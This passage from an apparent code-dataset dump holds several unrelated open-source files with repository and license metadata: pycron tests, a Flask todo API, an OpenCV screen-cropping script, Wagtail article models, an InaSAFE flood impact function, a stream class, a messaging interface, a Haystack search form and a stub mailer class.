assert pycron.is_now('10,20-30 * * * *', now) is False
# Issue 14
assert pycron.is_now('1-59/2 * * * *', now) is True
assert pycron.is_now('1-59/4 * * * *', now) is True
assert pycron.is_now('1-59/8 * * * *', now) is True
now = datetime(2015, 6, 18, 0, 9)
run(now)
run(now.replace(tzinfo=utc))
run(pendulum.instance(now))
run(arrow.get(now))
run(udatetime.from_string(now.isoformat()))
run(Delorean(datetime=now, timezone='UTC').datetime)
def test_last_minute():
def run(now):
assert pycron.is_now('* * * * *', now)
assert pycron.is_now('59 * * * *', now)
assert pycron.is_now('*/1 * * * *', now)
# Issue 14
assert pycron.is_now('1-59/2 * * * *', now) is True
now = datetime(2015, 6, 18, 0, 59)
run(now)
run(now.replace(tzinfo=utc))
run(pendulum.instance(now))
run(arrow.get(now))
run(udatetime.from_string(now.isoformat()))
run(Delorean(datetime=now, timezone='UTC').datetime)
def test_minute_ranges():
for i in range(1, 59, 2):
now = datetime(2015, 6, 18, 0, i)
assert pycron.is_now('1-59/2 * * * *', now)
assert pycron.is_now('1-59/2 * * * *', now.replace(tzinfo=utc))
assert pycron.is_now('1-59/2 * * * *', pendulum.instance(now))
assert pycron.is_now('1-59/2 * * * *', arrow.get(now))
assert pycron.is_now('1-59/2 * * * *', udatetime.from_string(now.isoformat()))
assert pycron.is_now('1-59/2 * * * *', Delorean(datetime=now, timezone='UTC').datetime)
for i in range(0, 59, 2):
now = datetime(2015, 6, 18, 0, i)
assert pycron.is_now('1-59/2 * * * *', now) is False
assert pycron.is_now('1-59/2 * * * *', now.replace(tzinfo=utc)) is False
assert pycron.is_now('1-59/2 * * * *', pendulum.instance(now)) is False
assert pycron.is_now('1-59/2 * * * *', arrow.get(now)) is False
assert pycron.is_now('1-59/2 * * * *', udatetime.from_string(now.isoformat())) is False
assert pycron.is_now('1-59/2 * * * *', Delorean(datetime=now, timezone='UTC').datetime) is False
|
mit
| 4,184,455,455,338,272,000
| 39.949367
| 104
| 0.550541
| false
| 2.917042
| false
| false
| false
|
chrisng93/todo-app
|
server/app/api/lists.py
|
1
|
1669
|
from flask import Blueprint, request, jsonify
from sqlalchemy.exc import IntegrityError
from ..models.List import List
from ..extensions import db
list_api = Blueprint('list', __name__, url_prefix='/api/list')
@list_api.route('/', methods=['GET'])
def get_lists():
lists = List.query
return jsonify({'lists': [todo_list.to_json() for todo_list in lists]})
@list_api.route('/<int:id>', methods=['GET'])
def get_list(id):
todo_list = List.query.get_or_404(id)
return jsonify({'list': todo_list.to_json()})
@list_api.route('/', methods=['POST'])
def create_list():
try:
todo_list = List().from_json(request.json)
db.session.add(todo_list)
db.session.commit()
return jsonify({'list': todo_list.to_json()}), 201
except IntegrityError as e:
return jsonify({'message': str(e)}), 400
@list_api.route('/<int:id>', methods=['PUT'])
def update_list(id):
try:
todo_list = List.query.get_or_404(id)
todo_list.from_json(request.json)
db.session.add(todo_list)
db.session.commit()
return jsonify({'list': todo_list.to_json()})
except IntegrityError as e:
return jsonify({'message': str(e)}), 400
@list_api.route('/<int:id>', methods=['DELETE'])
def delete_list(id):
todo_list = List.query.get_or_404(id)
db.session.delete(todo_list)
db.session.commit()
return jsonify({})
@list_api.route('/<int:id>/complete', methods=['PUT'])
def mark_all_complete(id):
todo_list = List.query.get_or_404(id)
todo_list.mark_all_complete()
db.session.add(todo_list)
db.session.commit()
return jsonify({'list': todo_list.to_json()})
|
mit
| 5,324,590,652,803,928,000
| 27.288136
| 75
| 0.630917
| false
| 3.272549
| false
| false
| false
|
meizhoubao/pyimagesearch
|
Pokedex/find_screen.py
|
1
|
2248
|
from pyimagesearch import imutils
from skimage import exposure
import numpy as np
import argparse
import cv2
ap = argparse.ArgumentParser()
ap.add_argument("-q", "--query", required=True,
help = "Path to the query image")
args = vars(ap.parse_args())
image = cv2.imread(args["query"])
ratio = image.shape[0] / 300.0
orig = image.copy()
image = imutils.resize(image, height = 300)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
gray = cv2.bilateralFilter(gray, 11, 17, 17)
edged = cv2.Canny(gray, 30, 200)
(cnts, _) = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cnts = sorted(cnts, key=cv2.contourArea, reverse=True)[:10]
screenCnt = None
for c in cnts:
peri = cv2.arcLength(c, True)
approx = cv2.approxPolyDP(c, 0.02 * peri, True)
if len(approx) == 4:
screenCnt = approx
break
# cv2.drawContours(image, [ScreenCnt], -1, (0, 255, 0), 3)
# cv2.imshow("Game Boy Screen", image)
# cv2.waitKey(0)
pts = screenCnt.reshape(4, 2)
rect = np.zeros((4,2), dtype = "float32")
s = pts.sum(axis=1)
rect[0] = pts[np.argmin(s)]
rect[2] = pts[np.argmax(s)]
diff = np.diff(pts, axis=1)
rect[1] = pts[np.argmin(diff)]
rect[3] = pts[np.argmax(diff)]
rect *= ratio
(tl, tr, br, bl) = rect
widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))
widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))
heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))
heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))
maxWidth = max(int(widthA), int(widthB))
maxHeight = max(int(heightA), int(heightB))
dst = np.array([
[0,0],
[maxWidth - 1, 0],
[maxWidth - 1, maxHeight - 1],
[0, maxHeight - 1]
], dtype = "float32")
M = cv2.getPerspectiveTransform(rect, dst)
wrap = cv2.warpPerspective(orig, M, (maxWidth, maxHeight))
wrap = cv2.cvtColor(wrap, cv2.COLOR_BGR2GRAY)
wrap = exposure.rescale_intensity(wrap, out_range = (0, 255))
(h, w) = wrap.shape
(dX, dY) = (int(w * 0.4), int(h * 0.4))
crop = wrap[10:dY, w - dX:w - 10]
cv2.imwrite("cropped.png", crop)
cv2.imshow("image", image)
cv2.imshow("edge", edged)
cv2.imshow("wrap", imutils.resize(wrap, height = 300))
cv2.imshow("crop", imutils.resize(crop, height = 300))
cv2.waitKey(0)
|
gpl-3.0
| -7,678,565,435,378,642,000
| 27.455696
| 82
| 0.626335
| false
| 2.414608
| false
| false
| false
|
jeremy-c/unusualbusiness
|
unusualbusiness/articles/models.py
|
1
|
13076
|
from __future__ import unicode_literals
from django.db import models
from django.db.models import Model
from django.utils import timezone
from django.utils.translation import ugettext as _
from modelcluster.fields import ParentalKey
from taggit.models import TaggedItemBase, CommonGenericTaggedItemBase, GenericUUIDTaggedItemBase, Tag
from wagtail.wagtailadmin.edit_handlers import FieldPanel, InlinePanel, PageChooserPanel, StreamFieldPanel
from wagtail.wagtailcore import blocks
from wagtail.wagtailcore.fields import StreamField
from wagtail.wagtailcore.models import Page, Orderable
from wagtail.wagtailembeds.blocks import EmbedBlock
from wagtail.wagtailimages.blocks import ImageChooserBlock
from wagtail.wagtailimages.edit_handlers import ImageChooserPanel
from wagtail.wagtailsearch import index
from unusualbusiness.events.models import EventPage
from unusualbusiness.organizations.models import OrganizationPage
from unusualbusiness.utils.models import PageFormat, RenderInlineMixin, RelatedHowToMixin, FeaturedImageBlock, \
FeaturedVideoBlock, FeaturedAudioBlock, PullQuoteBlock
class TheoryArticleIndexPage(Page):
parent_page_types = ['pages.HomePage']
subpage_types = ['articles.TheoryArticlePage']
def get_context(self, request):
context = super(TheoryArticleIndexPage, self).get_context(request)
# Add extra variables and return the updated context
context['theory_articles'] = TheoryArticlePage.objects.all().live().order_by('-publication_date')
context['parent'] = self.get_parent().specific
return context
class StoryArticleIndexPage(Page):
parent_page_types = ['pages.HomePage']
subpage_types = ['articles.StoryArticlePage']
def get_context(self, request):
context = super(StoryArticleIndexPage, self).get_context(request)
# Add extra variables and return the updated context
context['story_articles'] = StoryArticlePage.objects.all().live().order_by('-publication_date')
return context
class ActivityIndexPage(Page):
parent_page_types = ['pages.HomePage']
subpage_types = ['events.EventPage', 'articles.NewsArticlePage', ]
@staticmethod
def featured_articles():
event_list = EventPage.objects.live().filter(is_featured=True)
return sorted(event_list,
key=lambda instance: instance.first_published_at,
reverse=True)
def get_context(self, request):
context = super(ActivityIndexPage, self).get_context(request)
context['events'] = EventPage.objects.live().order_by('start_date')
context['initial_slide'] = EventPage.objects.live().count() - 1
context['news_articles'] = NewsArticlePage.objects.child_of(self).live().order_by('-publication_date')
return context
class AbstractArticle(models.Model, RenderInlineMixin):
is_featured = models.BooleanField(
verbose_name = _("Is Featured on home page"),
default=False
)
subtitle = models.CharField(
verbose_name=_('subtitle'),
max_length=255,
help_text=_("The subtitle of the page"),
blank=True
)
featured = StreamField([
('featured_image', FeaturedImageBlock()),
('featured_video', FeaturedVideoBlock()),
('featured_audio', FeaturedAudioBlock()),
])
author = models.ForeignKey(
'articles.AuthorPage',
verbose_name=_('author'),
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name='+'
)
publication_date = models.DateField(
verbose_name=_('publication_date'),
help_text=_("The publication date of the article"),
default=timezone.now,
blank=True,
null=True,
)
body = StreamField([
('introduction', blocks.TextBlock(icon="italic", rows=3)),
('paragraph', blocks.RichTextBlock(icon="pilcrow")),
# ('markdown_paragraph', MarkdownBlock(icon="code")),
('image', ImageChooserBlock(icon="image")),
('pullquote', PullQuoteBlock()),
])
class Meta:
abstract = True
verbose_name = _("Article")
def __featured_item(self, block_type='featured_image'):
for stream_child in self.featured:
if stream_child.block_type == block_type:
return stream_child
return None
@property
def featured_image(self):
return self.__featured_item('featured_image')
@property
def featured_audio(self):
return self.__featured_item('featured_audio')
@property
def featured_video(self):
return self.__featured_item('featured_video')
@property
def introduction(self):
for stream_child in self.body:
if stream_child.block_type == 'introduction':
return stream_child.value
return None
class StoryArticlePage(Page, AbstractArticle, RelatedHowToMixin):
parent_page_types = ['articles.StoryArticleIndexPage']
subpage_types = []
format = models.CharField(
verbose_name=_('page_format'),
max_length=32,
null=False,
default='text',
choices=(PageFormat.TEXT,
PageFormat.AUDIO,
PageFormat.VIDEO,
PageFormat.IMAGES, ))
class Meta:
verbose_name = _("Story")
verbose_name_plural = _("Stories")
def related_organizations(self):
return [related_organization.organization_page
for related_organization
in self.organizations.select_related().all()]
def get_context(self, request):
context = super(StoryArticlePage, self).get_context(request)
related_how_tos = self.related_how_tos()
context['related_how_tos'] = related_how_tos
context['upcoming_related_event'] = self.upcoming_related_event(related_how_tos)
context['related_how_tos_with_articles'] = self.related_how_to_story_articles(related_how_tos, self.id)
context['parent'] = self.get_parent().specific
return context
StoryArticlePage.content_panels = Page.content_panels + [
FieldPanel('is_featured'),
FieldPanel('subtitle'),
PageChooserPanel('author', page_type='articles.AuthorPage'),
FieldPanel('format'),
FieldPanel('publication_date'),
StreamFieldPanel('featured'),
StreamFieldPanel('body'),
InlinePanel('organizations', label=_("Organizations")),
]
StoryArticlePage.promote_panels = Page.promote_panels
StoryArticlePage.search_fields = Page.search_fields + [
index.SearchField('title_en'),
index.SearchField('title_nl'),
index.SearchField('subtitle_en'),
index.SearchField('subtitle_nl'),
index.SearchField('body_en'),
index.SearchField('body_nl'),
index.RelatedFields('organizations', [
index.SearchField('title'),
]),
index.RelatedFields('how_to_page', [
index.SearchField('title'),
]),
index.RelatedFields('author', [
index.SearchField('title'),
]),
]
class StoryArticlePageOrganization(Orderable, models.Model):
story_article_page = ParentalKey('articles.StoryArticlePage', related_name='organizations')
organization_page = models.ForeignKey(
'organizations.OrganizationPage',
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name='story_article_page'
)
panels = [
PageChooserPanel('organization_page'),
]
def __str__(self): # __unicode__ on Python 2
return self.story_article_page.title + " -> " + self.organization_page.title
class TheoryArticlePage(Page, AbstractArticle, RelatedHowToMixin):
ajax_template = 'articles/blocks/inline_theory_article.html'
parent_page_types = ['articles.TheoryArticleIndexPage']
subpage_types = []
format = models.CharField(
verbose_name=_('page_format'),
max_length=32,
null=False,
default='theory',
choices=(PageFormat.THEORY,
PageFormat.AUDIO,
PageFormat.VIDEO,
PageFormat.LINK,
PageFormat.DOCUMENT, ))
class Meta:
verbose_name = _("Theory")
verbose_name_plural = _("Theories")
def get_context(self, request):
context = super(TheoryArticlePage, self).get_context(request)
related_how_tos = self.related_how_tos()
context['related_how_tos'] = related_how_tos
context['upcoming_related_event'] = self.upcoming_related_event(related_how_tos)
context['related_how_tos_with_articles'] = self.related_how_to_theory_articles(related_how_tos, self.id)
context['parent'] = self.get_parent().specific
return context
TheoryArticlePage.content_panels = Page.content_panels + [
FieldPanel('is_featured'),
FieldPanel('subtitle'),
PageChooserPanel('author', page_type='articles.AuthorPage'),
FieldPanel('format'),
StreamFieldPanel('featured'),
FieldPanel('publication_date'),
StreamFieldPanel('body'),
]
TheoryArticlePage.promote_panels = Page.promote_panels
TheoryArticlePage.search_fields = Page.search_fields + [
index.SearchField('title_en'),
index.SearchField('title_nl'),
index.SearchField('subtitle_en'),
index.SearchField('subtitle_nl'),
index.SearchField('body_en'),
index.SearchField('body_nl'),
index.RelatedFields('how_to_page', [
index.SearchField('title'),
]),
index.RelatedFields('author', [
index.SearchField('title'),
]),
]
class NewsArticlePage(Page, AbstractArticle, RelatedHowToMixin):
event_page = models.ForeignKey(
'events.EventPage',
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name='news_article_page'
)
format = models.CharField(
verbose_name=_('page_format'),
max_length=32,
null=False,
default='event',
choices=(PageFormat.EVENT,
PageFormat.IMAGES,
PageFormat.AUDIO,
PageFormat.VIDEO, ))
parent_page_types = ['events.EventPage', 'articles.ActivityIndexPage']
subpage_types = []
class Meta:
verbose_name = _("News or report article")
verbose_name_plural = _("News or report articles")
def get_context(self, request):
context = super(NewsArticlePage, self).get_context(request)
related_how_tos = self.related_how_tos()
context['related_how_tos'] = related_how_tos
context['upcoming_related_event'] = self.upcoming_related_event(related_how_tos)
context['related_how_tos_with_articles'] = self.related_how_to_news_articles(related_how_tos, self.id)
context['parent'] = self.get_parent().specific
return context
NewsArticlePage.content_panels = Page.content_panels + [
FieldPanel('is_featured'),
PageChooserPanel('event_page', page_type='events.EventPage'),
FieldPanel('subtitle'),
PageChooserPanel('author', page_type='articles.AuthorPage'),
FieldPanel('format'),
StreamFieldPanel('featured'),
FieldPanel('publication_date'),
StreamFieldPanel('body'),
]
NewsArticlePage.promote_panels = Page.promote_panels
NewsArticlePage.search_fields = Page.search_fields + [
index.SearchField('title_en'),
index.SearchField('title_nl'),
index.SearchField('subtitle_en'),
index.SearchField('subtitle_nl'),
index.SearchField('body_en'),
index.SearchField('body_nl'),
index.RelatedFields('event_page', [
index.SearchField('title'),
]),
index.RelatedFields('author', [
index.SearchField('title'),
]),
]
class AuthorPage(Page):
photo = models.ForeignKey(
'wagtailimages.Image',
verbose_name=_('photo'),
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name='+'
)
biography = models.TextField(
verbose_name=_('biography'),
help_text=_("The biography of the author (max. 150 woorden)"),
blank=True
)
parent_page_types = ['articles.AuthorIndexPage']
subpage_types = []
class Meta:
verbose_name = _("Author")
verbose_name_plural = _("Authors")
AuthorPage.content_panels = Page.content_panels + [
FieldPanel('biography'),
ImageChooserPanel('photo'),
]
AuthorPage.promote_panels = Page.promote_panels
class AuthorIndexPage(Page):
parent_page_types = ['pages.HomePage']
subpage_types = ['articles.AuthorPage']
def get_context(self, request):
context = super(AuthorIndexPage, self).get_context(request)
# Add extra variables and return the updated context
context['authors'] = AuthorPage.objects.all().live()
context['parent'] = self.get_parent().specific
return context
|
bsd-3-clause
| 738,842,656,338,968,400
| 32.875648
| 112
| 0.643698
| false
| 4.08625
| false
| false
| false
|
Samweli/inasafe
|
safe/impact_functions/inundation/flood_raster_population/impact_function.py
|
1
|
8986
|
# coding=utf-8
"""InaSAFE Disaster risk tool by Australian Aid - Flood Raster Impact Function
on Population.
Contact : ole.moller.nielsen@gmail.com
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Rizky Maulana Nugraha'
import logging
import numpy
from safe.impact_functions.core import (
population_rounding,
has_no_data)
from safe.impact_functions.impact_function_manager \
import ImpactFunctionManager
from safe.impact_functions.inundation.flood_raster_population\
.metadata_definitions import FloodEvacuationRasterHazardMetadata
from safe.impact_functions.bases.continuous_rh_continuous_re import \
ContinuousRHContinuousRE
from safe.utilities.i18n import tr
from safe.impact_functions.core import no_population_impact_message
from safe.common.exceptions import ZeroImpactException
from safe.storage.raster import Raster
from safe.common.utilities import (
format_int,
create_classes,
humanize_class,
create_label,
verify)
from safe.gui.tools.minimum_needs.needs_profile import add_needs_parameters, \
get_needs_provenance_value
from safe.impact_reports.population_exposure_report_mixin import \
PopulationExposureReportMixin
from safe.definitions import no_data_warning
import safe.messaging as m
LOGGER = logging.getLogger('InaSAFE')
class FloodEvacuationRasterHazardFunction(
ContinuousRHContinuousRE,
PopulationExposureReportMixin):
# noinspection PyUnresolvedReferences
"""Risk plugin for flood population evacuation."""
_metadata = FloodEvacuationRasterHazardMetadata()
def __init__(self):
"""Constructor."""
super(FloodEvacuationRasterHazardFunction, self).__init__()
PopulationExposureReportMixin.__init__(self)
self.impact_function_manager = ImpactFunctionManager()
# AG: Use the proper minimum needs, update the parameters
self.parameters = add_needs_parameters(self.parameters)
# Initialize instance attributes for readability (pylint)
self.no_data_warning = False
def notes(self):
"""Return the notes section of the report.
:return: The notes that should be attached to this impact report.
:rtype: list
"""
population = format_int(population_rounding(self.total_population))
thresholds = self.parameters['thresholds'].value
if get_needs_provenance_value(self.parameters) is None:
needs_provenance = ''
else:
needs_provenance = tr(get_needs_provenance_value(self.parameters))
fields = [
tr('Total population in the analysis area: %s') % population,
tr('<sup>1</sup>People need evacuation if flood levels exceed '
'%(eps).1f m.') % {'eps': thresholds[-1]},
needs_provenance,
]
if self.no_data_warning:
fields = fields + no_data_warning
# include any generic exposure specific notes from definitions.py
fields = fields + self.exposure_notes()
# include any generic hazard specific notes from definitions.py
fields = fields + self.hazard_notes()
return fields
def _tabulate_zero_impact(self):
thresholds = self.parameters['thresholds'].value
message = m.Message()
table = m.Table(
style_class='table table-condensed table-striped')
row = m.Row()
label = m.ImportantText(
tr('People in %.1f m of water') % thresholds[-1])
content = '%s' % format_int(self.total_evacuated)
row.add(m.Cell(label))
row.add(m.Cell(content))
table.add(row)
table.caption = self.question
message.add(table)
message = message.to_html(suppress_newlines=True)
return message
def run(self):
"""Risk plugin for flood population evacuation.
Counts number of people exposed to flood levels exceeding
specified threshold.
:returns: Map of population exposed to flood levels exceeding the
threshold. Table with number of people evacuated and supplies
required.
:rtype: tuple
"""
# Determine depths above which people are regarded affected [m]
# Use thresholds from inundation layer if specified
thresholds = self.parameters['thresholds'].value
verify(
isinstance(thresholds, list),
'Expected thresholds to be a list. Got %s' % str(thresholds))
# Extract data as numeric arrays
data = self.hazard.layer.get_data(nan=True) # Depth
if has_no_data(data):
self.no_data_warning = True
# Calculate impact as population exposed to depths > max threshold
population = self.exposure.layer.get_data(nan=True, scaling=True)
total = int(numpy.nansum(population))
if has_no_data(population):
self.no_data_warning = True
# merely initialize
impact = None
for i, lo in enumerate(thresholds):
if i == len(thresholds) - 1:
# The last threshold
thresholds_name = tr(
'People in >= %.1f m of water') % lo
self.impact_category_ordering.append(thresholds_name)
self._evacuation_category = thresholds_name
impact = medium = numpy.where(data >= lo, population, 0)
else:
# Intermediate thresholds
hi = thresholds[i + 1]
thresholds_name = tr(
'People in %.1f m to %.1f m of water' % (lo, hi))
self.impact_category_ordering.append(thresholds_name)
medium = numpy.where((data >= lo) * (data < hi), population, 0)
# Count
val = int(numpy.nansum(medium))
self.affected_population[thresholds_name] = val
# Put the deepest area in top #2385
self.impact_category_ordering.reverse()
self.total_population = total
self.unaffected_population = total - self.total_affected_population
# Carry the no data values forward to the impact layer.
impact = numpy.where(numpy.isnan(population), numpy.nan, impact)
impact = numpy.where(numpy.isnan(data), numpy.nan, impact)
# Count totals
evacuated = self.total_evacuated
self.minimum_needs = [
parameter.serialize() for parameter in
self.parameters['minimum needs']
]
total_needs = self.total_needs
# check for zero impact
if numpy.nanmax(impact) == 0 == numpy.nanmin(impact):
message = no_population_impact_message(self.question)
raise ZeroImpactException(message)
# Create style
colours = [
'#FFFFFF', '#38A800', '#79C900', '#CEED00',
'#FFCC00', '#FF6600', '#FF0000', '#7A0000']
classes = create_classes(impact.flat[:], len(colours))
interval_classes = humanize_class(classes)
style_classes = []
for i in xrange(len(colours)):
style_class = dict()
if i == 1:
label = create_label(interval_classes[i], 'Low')
elif i == 4:
label = create_label(interval_classes[i], 'Medium')
elif i == 7:
label = create_label(interval_classes[i], 'High')
else:
label = create_label(interval_classes[i])
style_class['label'] = label
style_class['quantity'] = classes[i]
style_class['transparency'] = 0
style_class['colour'] = colours[i]
style_classes.append(style_class)
style_info = dict(
target_field=None,
style_classes=style_classes,
style_type='rasterStyle')
impact_data = self.generate_data()
extra_keywords = {
'map_title': self.map_title(),
'legend_notes': self.metadata().key('legend_notes'),
'legend_units': self.metadata().key('legend_units'),
'legend_title': self.metadata().key('legend_title'),
'evacuated': evacuated,
'total_needs': total_needs
}
impact_layer_keywords = self.generate_impact_keywords(extra_keywords)
# Create raster object and return
impact_layer = Raster(
impact,
projection=self.hazard.layer.get_projection(),
geotransform=self.hazard.layer.get_geotransform(),
name=self.metadata().key('layer_name'),
keywords=impact_layer_keywords,
style_info=style_info)
impact_layer.impact_data = impact_data
self._impact = impact_layer
return impact_layer
|
gpl-3.0
| -2,536,155,877,016,420,000
| 35.677551
| 79
| 0.620632
| false
| 4.154415
| false
| false
| false
|
Joev-/Streaman
|
streaman/stream.py
|
1
|
3561
|
"""
streaman.stream
---------------
Provides the base `Stream` and `Channel` classes which must be overridden by
implemented services.
"""
import time
import os
try:
import cPickle as pickle
except ImportError:
import pickle
from types import MethodType
from streaman.common import *
class Stream(object):
""" A raw `Stream` object. Stores a Name, URI and Service ID for a stream. """
def __init__(self, service, name, uri, url):
self.service = service
self.name = name
self.uri = uri
self.url = url
self.status = STATUS_OFFLINE
self.last_update = int(time.time())
def __repr__(self):
return "<Stream: ({0}) {1}>".format(SERVICE_NAME[self.service], self.name)
def __getstate__(self):
"""
Overriden for pickling purposes. Only the attributes
of the underlying `Stream` class need to be pickled.
"""
to_pickle = ["service", "name", "uri", "url"]
d = dict()
for k, v in self.__dict__.items():
if k in to_pickle:
d[k]=v
return d
def __setstate__(self, d):
"""
Overriden for pickling purposes.
Initialises null values for attributes that should exist.
"""
d["channel"] = None
d["status"] = STATUS_OFFLINE
d["last_update"] = 0
# Most streams will have some sort of game attribute.
d["game"] = ""
self.__dict__.update(d)
def update(self, updateModel, index):
"""
This method should be used to update the Stream with new data.
At the least it informs the model that the data at the given index
has been updated. The updateModel method is a method inside the
Model class, usually `notify_stream_updated`
"""
updateModel(index)
self.last_update = int(time.time())
@staticmethod
def generate_uri(stream_name):
"""
Takes a stream name and returns a URI.
Must be overridden and implemented for each streaming service.
"""
raise NotImplementedError("Method must be overridden")
@staticmethod
def generate_url(stream_name):
"""
Takes a stream name and returns a URL.
Must be overridden and implemented for each streaming service.
A URL differs from a URI in that it is the hyperlink to the stream web page.
This will be used when user's click on the "View on [service]" button.
"""
raise NotImplementedError("Method must be overridden")
@staticmethod
def is_valid(stream_uri):
"""
Ensures a `Stream` is valid on the service.
Must be overridden and implemented correctly for each streaming service.
"""
raise NotImplementedError("Method must be overridden")
def get_icon(self):
""" Returns a valid resource URI for to an icon. Must be overridden."""
raise NotImplementedError("Method must be overridden")
@property
def online(self):
return self.status
def update_status(self, status):
self.status = status
def check_status(self):
""" Uses `self.uri` to check the status of the stream. """
pass
class Channel(object):
""" Most streams will contain a `Channel` with more information. """
def __init__(self):
self.name = ""
self.display_name = ""
self.banner = ""
self.logo = ""
def __repr__(self):
return "<Channel: {0}>".format(self.name)
|
mit
| -3,287,934,114,056,025,600
| 28.92437
| 84
| 0.596462
| false
| 4.423602
| false
| false
| false
|
Alberto-Beralix/Beralix
|
i386-squashfs-root/usr/share/pyshared/ubuntuone-client/ubuntuone/status/messaging.py
|
1
|
1398
|
# ubuntuone.status.messaging - Messages to the user
#
# Author: Eric Casteleijn <eric.casteleijn@canonical.com>
#
# Copyright 2011 Canonical Ltd.
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3, as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranties of
# MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
"""Module that defines the interfaces for messaging the end user."""
from abc import ABCMeta, abstractmethod
APPLICATION_NAME = 'Ubuntu One Client'
class AbstractMessaging(object):
"""Abstract Base Class for notification implementations."""
__metaclass__ = ABCMeta
# pylint: disable=R0913
@abstractmethod
def show_message(self, sender, callback=None, message_time=None,
message_count=None, icon=None):
"""Show a message in the messaging menu."""
# pylint: enable=R0913
@abstractmethod
def update_count(self, sender, add_count):
"""Update the count for an existing indicator."""
|
gpl-3.0
| -7,006,785,282,109,029,000
| 34.846154
| 75
| 0.726037
| false
| 4.052174
| false
| false
| false
|
RENCI/xDCIShare
|
hs_core/discovery_form.py
|
1
|
4927
|
from haystack.forms import FacetedSearchForm
from haystack.query import SQ, SearchQuerySet
from crispy_forms.layout import *
from crispy_forms.bootstrap import *
from django import forms
class DiscoveryForm(FacetedSearchForm):
NElat = forms.CharField(widget = forms.HiddenInput(), required=False)
NElng = forms.CharField(widget = forms.HiddenInput(), required=False)
SWlat = forms.CharField(widget = forms.HiddenInput(), required=False)
SWlng = forms.CharField(widget = forms.HiddenInput(), required=False)
start_date = forms.DateField(label='From Date', required=False)
end_date = forms.DateField(label='To Date', required=False)
def search(self):
if not self.cleaned_data.get('q'):
sqs = self.searchqueryset.filter(discoverable=True).filter(is_replaced_by=False)
else:
sqs = super(FacetedSearchForm, self).search().filter(discoverable=True).filter(is_replaced_by=False)
geo_sq = SQ()
if self.cleaned_data['NElng'] and self.cleaned_data['SWlng']:
if float(self.cleaned_data['NElng']) > float(self.cleaned_data['SWlng']):
geo_sq.add(SQ(coverage_east__lte=float(self.cleaned_data['NElng'])), SQ.AND)
geo_sq.add(SQ(coverage_east__gte=float(self.cleaned_data['SWlng'])), SQ.AND)
else:
geo_sq.add(SQ(coverage_east__gte=float(self.cleaned_data['SWlng'])), SQ.AND)
geo_sq.add(SQ(coverage_east__lte=float(180)), SQ.OR)
geo_sq.add(SQ(coverage_east__lte=float(self.cleaned_data['NElng'])), SQ.AND)
geo_sq.add(SQ(coverage_east__gte=float(-180)), SQ.AND)
if self.cleaned_data['NElat'] and self.cleaned_data['SWlat']:
geo_sq.add(SQ(coverage_north__lte=float(self.cleaned_data['NElat'])), SQ.AND)
geo_sq.add(SQ(coverage_north__gte=float(self.cleaned_data['SWlat'])), SQ.AND)
if geo_sq:
sqs = sqs.filter(geo_sq)
# Check to see if a start_date was chosen.
if self.cleaned_data['start_date']:
sqs = sqs.filter(coverage_start_date__gte=self.cleaned_data['start_date'])
# Check to see if an end_date was chosen.
if self.cleaned_data['end_date']:
sqs = sqs.filter(coverage_end_date__lte=self.cleaned_data['end_date'])
author_sq = SQ()
subjects_sq = SQ()
resource_sq = SQ()
public_sq = SQ()
owner_sq = SQ()
discoverable_sq = SQ()
published_sq = SQ()
variable_sq = SQ()
sample_medium_sq = SQ()
units_name_sq = SQ()
# We need to process each facet to ensure that the field name and the
# value are quoted correctly and separately:
for facet in self.selected_facets:
if ":" not in facet:
continue
field, value = facet.split(":", 1)
if value:
if "creators" in field:
author_sq.add(SQ(creators=sqs.query.clean(value)), SQ.OR)
elif "subjects" in field:
subjects_sq.add(SQ(subjects=sqs.query.clean(value)), SQ.OR)
elif "resource_type" in field:
resource_sq.add(SQ(resource_type=sqs.query.clean(value)), SQ.OR)
elif "public" in field:
public_sq.add(SQ(public=sqs.query.clean(value)), SQ.OR)
elif "owners_names" in field:
owner_sq.add(SQ(owners_names=sqs.query.clean(value)), SQ.OR)
elif "discoverable" in field:
discoverable_sq.add(SQ(discoverable=sqs.query.clean(value)), SQ.OR)
elif "published" in field:
published_sq.add(SQ(published=sqs.query.clean(value)), SQ.OR)
elif 'variable_names' in field:
variable_sq.add(SQ(variable_names=sqs.query.clean(value)), SQ.OR)
elif 'sample_mediums' in field:
sample_medium_sq.add(SQ(sample_mediums=sqs.query.clean(value)), SQ.OR)
elif 'units_names' in field:
units_name_sq.add(SQ(units_names=sqs.query.clean(value)), SQ.OR)
else:
continue
if author_sq:
sqs = sqs.filter(author_sq)
if subjects_sq:
sqs = sqs.filter(subjects_sq)
if resource_sq:
sqs = sqs.filter(resource_sq)
if public_sq:
sqs = sqs.filter(public_sq)
if owner_sq:
sqs = sqs.filter(owner_sq)
if discoverable_sq:
sqs = sqs.filter(discoverable_sq)
if published_sq:
sqs = sqs.filter(published_sq)
if variable_sq:
sqs = sqs.filter(variable_sq)
if sample_medium_sq:
sqs = sqs.filter(sample_medium_sq)
if units_name_sq:
sqs = sqs.filter(units_name_sq)
return sqs
|
bsd-3-clause
| -1,619,511,691,017,527,800
| 39.393443
| 112
| 0.574995
| false
| 3.526843
| false
| false
| false
|
thinksabin/lazy-devops
|
S3 bucket Maker/Mailer.py
|
1
|
1471
|
import datetime
import time
import smtplib
import os
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from smtplib import SMTP
class Mailer():
smtp_server = ''
smtp_username = ''
smtp_password = ''
